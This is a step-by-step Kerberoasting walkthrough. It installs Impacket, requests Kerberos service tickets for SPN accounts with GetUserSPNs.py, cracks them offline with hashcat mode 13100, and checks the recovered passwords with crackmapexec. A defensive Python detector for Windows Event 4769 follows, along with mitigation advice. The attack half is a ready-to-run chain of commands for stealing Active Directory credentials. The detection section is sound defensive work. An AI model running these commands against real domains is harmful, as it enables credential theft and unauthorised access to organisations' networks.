
Step 1: Set Up Impacket Tools

  1. Clone the Impacket repository:

    git clone https://github.com/SecureAuthCorp/impacket.git

  2. Navigate to the Impacket directory:

    cd impacket

  3. Install Impacket using pip:

    sudo python3 -m pip install .

Step 2: List Accounts and Request TGS Tickets

  1. List the accounts that have an SPN set:

    GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME]

  2. Request TGS tickets for all of the listed accounts:

    GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request

Step 3: Request Specific TGS Tickets and Save to File

  1. Request a specific TGS ticket:

    GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME]

  2. Save TGS tickets to a file:

    GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME] -outputfile [OUTPUT-FILE]

Step 4: Crack TGS Tickets and Confirm Access

  1. Crack the saved TGS tickets offline with hashcat:

    hashcat -m 13100 [TGS-FILE] /usr/share/wordlists/rockyou.txt

  2. Confirm access with the cracked credentials:

    crackmapexec smb [DC-IP] -u [USERNAME] -p [PASSWORD]
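The defender's counterpart to the steps above, as an added example that is not part of the original page or of Impacket: a small Python detector over constructed Windows Security Event 4769 (service ticket requested) records. It flags an account that requests RC4 (etype 0x17) service tickets for several distinct service accounts within a short window, which is the footprint the -request step leaves on the domain controller. The record field names, sample events, window and threshold are assumptions chosen for illustration.

```python
"""Detect likely Kerberoasting from Windows Security Event 4769 records.

Heuristic: one account requests RC4 (etype 0x17) service tickets for many
distinct user-backed service accounts within a short time window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC

# Constructed sample 4769 records (not real logs): one user enumerating SPNs
# in a burst, plus benign noise (a computer account and an AES request).
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "requester": "jdoe", "service": "svc_sql", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "requester": "jdoe", "service": "svc_http", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "requester": "jdoe", "service": "svc_backup", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:03", "requester": "jdoe", "service": "WS01$", "etype": "0x12", "status": "0x0"},
    {"time": "2024-05-01T09:05:00", "requester": "asmith", "service": "svc_sql", "etype": "0x12", "status": "0x0"},
    {"time": "2024-05-01T10:00:00", "requester": "jdoe", "service": "svc_mail", "etype": "0x17", "status": "0x0"},
]


def is_candidate(ev):
    """Keep successful RC4 requests for user service accounts; drop computer accounts and krbtgt."""
    svc = ev["service"]
    return (ev["status"] == "0x0" and ev["etype"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoasting(events, window_seconds=300, min_services=3):
    """Return {requester: sorted distinct services} for accounts that hit the threshold in any window."""
    per_user = defaultdict(list)
    for ev in events:
        if is_candidate(ev):
            per_user[ev["requester"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over the user's requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) >= min_services:
                alerts.setdefault(user, set()).update(distinct)
    return {u: sorted(s) for u, s in alerts.items()}


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_4769).items():
        print(f"ALERT possible Kerberoasting by {user}: {services}")
```

Because the page's hashcat mode 13100 targets RC4 tickets, enforcing AES-only service accounts (no RC4 etype in 4769) removes the crackable ticket type entirely, and honeypot SPN accounts with no real service make any 4769 for them a high-fidelity alert.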